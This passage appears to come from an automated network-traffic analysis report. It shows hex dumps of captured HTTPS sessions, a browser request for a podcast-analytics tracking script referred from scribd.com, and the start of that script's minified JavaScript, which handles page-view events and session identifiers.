                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 35 f4 02 55 21 55 c8 12 ba 52 28 00 06 cc cb 94 67 fd 4b 16 4d ac c3 63 0b 15 bc 28 63 12 5f d6 b5 4c bb 23 58 a4 94 11 f1 20 a7 02 9b 27 d8 1f ce 82 75 0d 81 8c 74 ed 7a 6f de ed 37 5e f5 af cc e9 b0 4e 72 fd 25 54 64 41 8d bb 96 77 fe 31 ef fa 94 fe df 77 b0 44 87 39 8f 39 4c 9f 46 e1 82 8c b6 61 1b a0 6e cf fc 27 4f 79 d6 85 0c 29 e7 c5 74 88 3b 32 ed 3f e3 cb 02 3e 55 4a 56 65 6d aa a0 41 39 23 e3 70 79 5b 89 ea 69 c2 97 a0 e8 ab be 2c 70 22 ce 1c 25 d3 77 dc 95 b4 f9 8a 23 a5 d2 de c5 64 eb 1c f5 bb ed 70 b1 84 4c 04 c1 86 63 c7 5e 62 95 c5 84 b4 9b 66 04 b4 b4 dc 07 5a c5 52 ff ca f6 c1 86 0b a8 e6 47 c3 f3 83 77 25 d7 4e 6c 85 08 59 b0 f9 0a 04 a5 16 e7 92 70 7e 14 4b 5d 05 5c 0a b6 b5 e7 e4 13 13 35 42 f4 c3 6a 3a c5 11 76 3f f8 a1 f3 ad e5 cf c2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 5U!UR(gKMc(c_L#X 'utzo7^Nr%TdAw1wD99LFan'Oy)t;2?>UJVemA9#py[i,p"%w#dpLc^bfZRGw%NlYp~K]\5Bj:v?
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 3e a6 01 51 71 68 ef 68 4c e3 a2 e2 d2 5e 63 4c c3 a3 82 69 ef 78 4c a3 a4 32 a5 bd 93 31 0d 96 ca 8c f6 de 8e 69 cc 54 e6 eb 2a 0d d7 f3 ad 7a 88 65 bb 9f 3a d5 04 64 09 0e c3 c4 f6 cd 77 fb c5 63 15 83 5e e2 69 02 c0 5c 81 2d 6a 81 94 e6 5d 8a 0a 46 3d 86 93 7d ad fe 8e 9e df d3 f1 37 47 f5 4c 84 bb 5a a3 a2 a6 a0 ca 49 03 66 bd 3f 3d 6d 68 63 96 19 a7 7e 08 8b 2c 13 ee 30 4b 5e 9a 4c e5 f8 39 2a d9 d4 fc c9 c0 6c ec 67 27 09 7e 6b b1 ab cc 64 ab fa c5 43 00 cf 3b af 1c 03 68 d2 91 f2 44 fe 18 00 55 56 bb 90 c7 72 a5 a6 ca 60 a4 2c 23 f5 e0 6e cc b4 50 14 d8 bc 60 43 69 9d c0 c6 ff 3f 96 09 c7 3f 51 26 28 ab 18 97 c8 c5 02 68 46 f7 0a cf 45 ed eb de 60 d8 ea 0d 07 66 4e 76 fa 12 2c 89 15 72 e1 49 2c 26 43 d9 08 80 c8 1b 64 18 c6 71 42 77 8b 2f 57 97 17
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >QqhhL^cLixL21iT*ze:dwc^i\-j]F=}7GLZIf?=mhc~,0K^L9*lg'~kdC;hDUVr`,#nP`Ci??Q&(hFE`fNv,rI,&CdqBw/W
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 86 7f dc 58 06 db 6c 21 57 92 87 82 a8 6c f0 03 8c 05 da c0 ba b4 da c3 eb 1c fe a4 3d 18 f0 39 a4 a9 f0 6d 6b 68 7d 19 8a 61 d2 a6 f4 08 df 61 ab db 1b 50 c2 69 8f c1 ac 2f b0 b0 19 80 36 81 6f 1a f1 40 00 b2 54 c6 19 b6 2c 0b 16 2a 7d 90 8d 85 89 05 69 9f b7 e4 b9 45 a1 89 b8 29 90 4a cc 64 4d c7 a8 b8 1b f2 8f 7e b8 fc f6 3f 39 25 bc 7a 44 80 ea eb bf 56 38 7a 84 34 0a eb 3f c9 9f 16 fe 22 10 f1 19 9a be 85 8a 58 6d 1c cb 53 f8 10 50 26 1b fc f7 86 0c a3 5b be 86 6c 58 b8 de 02 2a 42 28 59 60 35 d3 d4 9d 95 8c 04 29 fd c0 8b 1c 4d 3a e4 ed 05 61 4e 26 a9 5a 45 d1 95 0a 41 da 34 b9 da fa 4e 82 bb 06 85 a1 c8 3d 1a b9 9f 1b 01 99 73 f2 09 01 85 de d6 33 29 1c 36 42 b2 18 ff 56 73 e9 7b 89 29 0d d3 57 74 50 3e eb 4a 7a 1a a6 23 fc c0 7d 5a 3f 93 90 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Xl!Wl=9mkh}aaPi/6o@T,*}iE)JdM~?9%zDV8z4?"XmSP&[lX*B(Y`5)M:aN&ZEA4N=s3)6BVs{)WtP>Jz#}Z?
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 5b c9 ce f5 fc bd 64 a8 3b 72 8e bd ee 8e 87 17 f2 af dc 46 cf 2e 07 e3 94 f5 27 1d 13 99 6d 9f 4e a8 c3 d9 0a 1a 7d b9 05 ae 14 26 1a 96 dd 52 ce e3 b2 d0 89 75 7a 6f 56 90 c6 8e 13 b6 08 f2 2c 91 a5 de ce 6e 47 72 9b d0 2b cb a4 b3 8a 3e 45 d8 4c ee 9e 53 1f ae 44 1c 97 83 81 22 4c 22 23 b4 d5 e7 4e 90 2d c7 a1 81 94 0b b6 6c 70 38 2f 2b 2c 36 bb de 5f 0e ba fd ba 32 6d 34 65 64 fb 2c 95 20 2c 93 b0 67 d6 1f 74 19 50 3c e5 7a 60 2b 7d 94 8d d4 24 2b 8e e1 f8 be 35 5a d8 07 54 e9 0c 4a ac d7 36 c6 fb 49 ff 96 37 06 e2 16 b6 1a 68 17 66 a0 75 04 53 ac ff cb b0 bb df 2f 7f 6e 1b 1d c3 76 e3 59 7c c7 63 64 27 75 18 70 0e 73 f4 1c 0e 8b 67 d3 b9 ec b4 a5 66 98 3e ea c2 4f 30 9b 07 38 19 38 30 9f a4 a7 97 b3 57 0b c8 ac d5 36 1d 1e 21 79 0b 7d 33 08 dc 4e 5b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [d;rF.'mN}&RuzoV,nGr+>ELSD"L"#N-lp8/+,6_2m4ed, ,gtP<z`+}$+5ZTJ6I7hfuS/nvY|cd'upsgf>O0880W6!y}3N[
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 52 62 41 3c 3f 16 cc 6c f0 19 19 9d 08 db 90 6c 20 d8 90 32 9e 95 90 6e 4a d6 43 88 5d 6c 68 de 20 16 da 6d 1a 08 59 4a 5f b9 49 40 6a f2 5b 4c 26 e6 27 65 ec 8f fb 6a fa ab 84 2d db 3a 50 1e 29 31 d1 ce 1c 76 b3 c5 f0 6f 39 ac 44 09 05 ea bb 63 56 2f d0 39 88 ba 0d ea 4d dd b2 68 02 83 d5 fe c4 40 64 ae ff b9 00 07 6d 12 c1 a4 6a 53 9f ef e2 71 6d 5d 58 63 90 e0 11 c1 66 85 8f 2b 93 5a 44 e0 a4 28 62 9b 8b a0 c2 ea 41 5e 91 44 5b 4c 8a 48 5b c8 52 06 55 82 63 05 2a e1 fd be 52 61 88 e0 b4 79 57 58 74 19 92 70 a8 4b 79 dd e7 14 f2 aa 05 b2 74 6d 8a 28 8d c6 90 64 4c a6 36 1b 4b 62 16 b1 31 7e 3f 3e c9 05 88 3f 85 4b 3a 12 ca d7 f2 ca 2f 58 9c e2 6c d4 54 f2 a5 1b 2f 63 0a 2b f9 ab e6 c8 0e f3 fb 00 ac 1c 0e 3e 80 bf 2a d9 c6 6c ff c4 57 b2 e4 2f a5 58 5b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RbA<?ll 2nJC]lh mYJ_I@j[L&'ej-:P)1vo9DcV/9Mh@dmjSqm]Xcf+ZD(bA^D[LH[RUc*RayWXtpKytm(dL6Kb1~?>?K:/XlT/c+>*lW/X[
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 62 f5 10 f6 47 77 64 c4 99 9c a0 69 f1 06 d9 77 1e 50 58 82 3f ba d3 b1 97 f3 ab 4c 82 75 49 0c c7 17 13 2f af 2d 93 92 a5 6c b9 0f b6 dd 69 9e 44 e2 c7 96 72 47 4f 99 c0 7b 14 91 b8 9e ab 24 4d 61 ad a6 32 cf 28 af 93 ea 1c 9d b0 95 e4 c9 16 20 5c 2e 9b f4 85 e4 95 50 48 4a d2 84 42 2c 64 ea db eb f0 4d 94 01 4f 36 1d be 87 d2 e1 49 a6 7b 6b 09 81 29 41 f9 cf f1 fe 0f ce ae b5 d5 4f 69 4e b1 71 02 c7 41 c8 b4 08 0f ba 2b 70 4c 47 09 05 6b 76 8d 1a 0a 44 5a 0f 33 a2 26 10 0a 3a 96 25 7c cd 23 28 69 eb 7e 62 44 95 87 70 61 32 0f 6d 11 97 c9 03 83 44 63 d7 5e ae 52 7f 32 57 5d 32 0e d5 da 4e a5 13 a2 13 0b ce 98 33 e0 30 6b a0 35 4f a5 ed bd 64 a0 bc 0a c7 7b 3b 62 45 13 b6 7e ca 8b a3 87 18 38 ea 4d e5 ba 97 46 1b 9f 6f 55 56 86 01 11 11 db 95 a5 22 d9 7e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bGwdiwPX?LuI/-liDrGO{$Ma2( \.PHJB,dMO6I{k)AOiNqA+pLGkvDZ3&:%|#(i~bDpa2mDc^R2W]2N30k5Od{;bE~8MFoUV"~
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 6b 68 e0 8b 6a 94 06 04 80 1f 97 06 44 0d 3f b4 e7 31 ca ff 22 49 9a 89 79 f3 c9 02 b7 36 03 e9 54 63 92 45 8c 08 93 4b bc 49 ed 04 06 e6 fc 46 2d 54 3a 5d 27 a7 d6 b8 d5 69 1c f1 7b 81 1b 5d 2e 98 67 e0 58 a8 0c 0e ee a4 98 10 30 a5 dc 20 5b 72 d8 80 16 a3 ca 36 44 d7 6a bf 73 e4 2a 1d 64 11 03 b2 5c 29 2b ba b1 eb 6a 35 f6 62 4e 10 9c 2a 30 f3 5c 7d 85 82 5c 5a 71 97 30 c0 53 bc 38 e4 e4 1a 04 ac b5 78 ae 1d 04 19 5a 5e 04 12 a7 8e f7 40 92 6b f1 7b 7d 36 f9 37 bb 1f 92 6b 1d b6 7d fb 0a ee 2a c3 58 21 80 65 8b c4 5c e4 b2 55 3b 13 ad 2b 49 7f 57 b6 59 b4 1c 2e f1 ee 23 20 cb 40 15 e6 89 a4 0d 29 31 4b 12 e6 03 13 ca c9 e4 ab ab d6 25 94 70 21 55 94 27 e8 4d b3 ad 7b 3f 99 cc f4 5e 91 d4 67 2c 25 7f 2c 22 fa 34 b5 bd cf ff 45 d8 0d 7d fe bd 88 ee 92 f3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: khjD?1"Iy6TcEKIF-T:]'i{].gX0 [r6Djs*d\)+j5bN*0\}\Zq0S8xZ^@k{}67k}*X!e\U;+IWY.# @)1K%p!U'M{?^g,%,"4E}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1196INData Raw: 77 d9 9d 3e 9f f4 07 fb b3 74 68 bc 41 0d f2 ad a2 21 30 19 1e 1e 3f de 7b fa e4 59 a1 5c 82 f0 cf b3 e2 f1 93 47 8d a7 72 14 38 e4 65 32 75 6f b7 28 d2 27 df 3d 6e ec d5 d6 d6 09 43 45 57 63 05 7d af 94 be 7f 82 8a d8 cb 02 2a 7b a9 2a 23 2c 19 3d 9e b7 bd 0c 47 ea 78 58 8e c7 f0 d6 67 49 0d 7c 99 9d b5 74 44 b3 e7 93 ab ab 2e 26 c9 6f c2 53 fa eb 2b ad 89 11 70 6f b4 66 5a 00 22 f9 15 80 24 72 87 78 27 1f 72 5d 51 8e a7 f6 ac 82 5e 2f 6b 61 46 92 20 11 39 9e d5 33 80 29 02 4c 01 60 69 ee 8c 32 02 b3 63 00 af bc ea 94 47 8e e6 6a 92 ae 23 b4 4e 39 9a 12 d2 e5 99 86 ed 80 8b 06 f1 2e 47 28 b6 6e 62 71 f7 30 92 52 e4 98 43 4e 7e 38 9a 74 67 aa 58 26 92 31 e2 0b 4a a8 5b b6 08 0c 98 cb 21 1c 64 2b ff 9a 0c 08 f1 15 99 65 25 11 25 6c 4a 58 af 44 f5 46 e8 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: w>thA!0?{Y\Gr8e2uo('=nCEWc}*{*#,=GxXgI|tD.&oS+pofZ"$rx'r]Q^/kaF 93)L`i2cGj#N9.G(nbq0RCN~8tgX&1J[!d+e%%lJXDFe


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        71192.168.2.164980835.244.142.804436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC520OUTGET /ping.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: cdn.pdst.fm
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC836INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-generation: 1719323749654301
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-length: 22096
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: crc32c=NZyeaA==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: md5=Tt3uyVr9qWmz0bL7lwwesQ==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 22096
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: Content-Type
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC4rVK7R2_-k5xagdr7QTZKVvLuOeDBR5vX9Bcvp84eROStkq9ZECc-3Tch47SQH--LPToY4Kg5Z3g
                                                                                                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:18:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 06 Dec 2024 22:18:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=3600
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2465
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 25 Jun 2024 13:55:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "4eddeec95afda969b3d1b2fb970c1eb1"
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC554INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 32 32 38 3a 74 3d 3e 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 65 3d 22 7e 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 6e 2c 65 29 7b 74 68 69 73 2e 66 6e 3d 74 2c 74 68 69 73 2e 63 6f 6e 74 65 78 74 3d 6e 2c 74 68 69 73 2e 6f 6e 63 65 3d 65 7c 7c 21 31 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 6e 2c 72 2c 69 2c 63 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 72 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 6c 69 73 74 65 6e 65 72 20 6d 75 73 74 20 62 65 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 76 61 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (()=>{"use strict";var t={228:t=>{var n=Object.prototype.hasOwnProperty,e="~";function r(){}function o(t,n,e){this.fn=t,this.context=n,this.once=e||!1}function i(t,n,r,i,c){if("function"!=typeof r)throw new TypeError("The listener must be a function");var
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 28 6e 65 77 20 72 29 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 28 65 3d 21 31 29 29 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 65 76 65 6e 74 4e 61 6d 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 72 2c 6f 3d 5b 5d 3b 69 66 28 30 3d 3d 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 43 6f 75 6e 74 29 72 65 74 75 72 6e 20 6f 3b 66 6f 72 28 72 20 69 6e 20 74 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 29 6e 2e 63 61 6c 6c 28 74 2c 72 29 26 26 6f 2e 70 75 73 68 28 65 3f 72 2e 73 6c 69 63 65 28 31 29 3a 72 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 3f 6f 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: type=Object.create(null),(new r).__proto__||(e=!1)),u.prototype.eventNames=function(){var t,r,o=[];if(0===this._eventsCount)return o;for(r in t=this._events)n.call(t,r)&&o.push(e?r.slice(1):r);return Object.getOwnPropertySymbols?o.concat(Object.getOwnProp
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 5b 70 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 70 5d 3b 66 5b 73 5d 2e 66 6e 2e 61 70 70 6c 79 28 66 5b 73 5d 2e 63 6f 6e 74 65 78 74 2c 61 29 7d 7d 72 65 74 75 72 6e 21 30 7d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 74 2c 6e 2c 65 2c 21 31 29 7d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 74 2c 6e 2c 65 2c 21 30 29 7d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 69 3d 65 3f 65 2b 74 3a 74 3b 69 66 28 21 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 69 5d 29 72 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [p-1]=arguments[p];f[s].fn.apply(f[s].context,a)}}return!0},u.prototype.on=function(t,n,e){return i(this,t,n,e,!1)},u.prototype.once=function(t,n,e){return i(this,t,n,e,!0)},u.prototype.removeListener=function(t,n,r,o){var i=e?e+t:t;if(!this._events[i])re
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 6e 67 28 31 36 29 2e 73 6c 69 63 65 28 31 29 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 2c 6e 3d 30 29 7b 72 65 74 75 72 6e 20 63 5b 74 5b 6e 2b 30 5d 5d 2b 63 5b 74 5b 6e 2b 31 5d 5d 2b 63 5b 74 5b 6e 2b 32 5d 5d 2b 63 5b 74 5b 6e 2b 33 5d 5d 2b 22 2d 22 2b 63 5b 74 5b 6e 2b 34 5d 5d 2b 63 5b 74 5b 6e 2b 35 5d 5d 2b 22 2d 22 2b 63 5b 74 5b 6e 2b 36 5d 5d 2b 63 5b 74 5b 6e 2b 37 5d 5d 2b 22 2d 22 2b 63 5b 74 5b 6e 2b 38 5d 5d 2b 63 5b 74 5b 6e 2b 39 5d 5d 2b 22 2d 22 2b 63 5b 74 5b 6e 2b 31 30 5d 5d 2b 63 5b 74 5b 6e 2b 31 31 5d 5d 2b 63 5b 74 5b 6e 2b 31 32 5d 5d 2b 63 5b 74 5b 6e 2b 31 33 5d 5d 2b 63 5b 74 5b 6e 2b 31 34 5d 5d 2b 63 5b 74 5b 6e 2b 31 35 5d 5d 7d 63 6f 6e 73 74 20 61 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 69 66 28 6e 2e 72 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ng(16).slice(1));function u(t,n=0){return c[t[n+0]]+c[t[n+1]]+c[t[n+2]]+c[t[n+3]]+"-"+c[t[n+4]]+c[t[n+5]]+"-"+c[t[n+6]]+c[t[n+7]]+"-"+c[t[n+8]]+c[t[n+9]]+"-"+c[t[n+10]]+c[t[n+11]]+c[t[n+12]]+c[t[n+13]]+c[t[n+14]]+c[t[n+15]]}const a=function(t,e,r){if(n.ra
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 6f 6e 28 6e 2c 65 29 7b 72 65 74 75 72 6e 20 6e 5b 65 5d 3d 74 2e 66 69 65 6c 64 73 5b 65 5d 28 74 5b 65 5d 29 2c 6e 7d 29 2c 7b 7d 29 7d 7d 2c 74 7d 28 29 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 3f 74 3a 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 3f 74 2e 74 6f 53 74 72 69 6e 67 28 29 3a 6e 75 6c 6c 7d 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 70 61 72 73 65 49 6e 74 28 74 2c 31 30 29 3b 72 65 74 75 72 6e 20 69 73 4e 61 4e 28 6e 29 3f 6e 75 6c 6c 3a 6e 7d 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: on(n,e){return n[e]=t.fields[e](t[e]),n}),{})}},t}(),w=function(){return function(t){return"string"==typeof t?t:"number"==typeof t?t.toString():null}},m=function(){return function(t){var n=parseInt(t,10);return isNaN(n)?null:n}},g=function(){return functi
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 28 74 5b 6f 5d 3d 6e 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 74 7d 2c 54 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 63 6f 6e 73 74 20 45 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 29 7b 76 61 72 20 65 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 7c 7c 74 68 69 73 3b 65 2e 61 63 74 69 6f 6e 3d 22 76 69 65 77 22 3b 76 61 72 20 72 3d 53 28 7b 73 6f 75 72 63 65 3a 77 28 29 2c 70 6c 61 63 65 6d 65 6e 74 3a 77 28 29 2c 66 72 6f 6d 3a 77 28 29 7d 29 3b 65 2e 66 69 65 6c 64 73 3d 54 28 7b 75 72 6c 3a 77 28 29 2c 72 65 66 65 72 72 65 72 3a 77 28 29 2c 69 6e 49 66 72 61 6d 65 3a 62 28 29 2c 77 69 6e 64 6f 77 57 69 64 74 68 3a 6d 28 29 2c 77 69 6e 64 6f 77 48 65 69 67 68 74 3a 6d 28 29 2c 74 69 6d 65 7a 6f 6e 65 4f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (t[o]=n[o]);return t},T.apply(this,arguments)};const E=function(t){function n(n){var e=t.call(this)||this;e.action="view";var r=S({source:w(),placement:w(),from:w()});e.fields=T({url:w(),referrer:w(),inIframe:b(),windowWidth:m(),windowHeight:m(),timezoneO
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 74 65 6d 28 49 2c 66 28 29 29 2c 6e 3d 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 49 29 29 2c 74 3d 6e 7c 7c 22 30 22 7d 72 65 74 75 72 6e 20 74 7d 2c 56 3d 7b 75 73 65 72 3a 55 28 29 2c 73 65 73 73 69 6f 6e 3a 44 28 29 2c 70 61 67 65 3a 66 28 29 7d 3b 63 6f 6e 73 74 20 71 3d 56 3b 76 61 72 20 4c 3d 7b 7d 2c 4e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 6e 2c 65 3d 22 73 70 64 74 2d 22 2e 63 6f 6e 63 61 74 28 73 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 28 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 31 65 33 29 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 6e 29 29 29 2c 72 3d 7b 6f 72 64 65 72 3a 30 2c 70 69 64 3a 71 2e 70 61 67 65 2c 73 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: tem(I,f()),n=sessionStorage.getItem(I)),t=n||"0"}return t},V={user:U(),session:D(),page:f()};const q=V;var L={},N=function(t){if(!t)return!1;var n,e="spdt-".concat(s(),"-").concat((void 0===n&&(n=1e3),Math.floor(Math.random()*n))),r={order:0,pid:q.page,si
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 65 2e 73 65 74 49 74 65 6d 28 22 70 61 72 74 6e 65 72 5f 75 73 65 72 5f 69 64 22 2c 6e 2e 70 61 72 74 6e 65 72 5f 75 73 65 72 5f 69 64 29 2c 65 2e 75 70 64 61 74 65 28 6e 29 2c 65 7d 72 65 74 75 72 6e 20 52 28 6e 2c 74 29 2c 6e 7d 28 6a 29 3b 76 61 72 20 48 3d 5b 5d 2c 7a 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 4c 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4c 5b 74 5d 7d 29 29 3b 69 66 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 29 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 6c 65 6e 67 74 68 3b 6e 2b 3d 31 29 7b 76 61 72 20 65 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e.setItem("partner_user_id",n.partner_user_id),e.update(n),e}return R(n,t),n}(j);var H=[],z=function(t){var n=function(){var t=Object.keys(L).map((function(t){return L[t]}));if(window.localStorage)for(var n=0;n<localStorage.length;n+=1){var e=localStorage
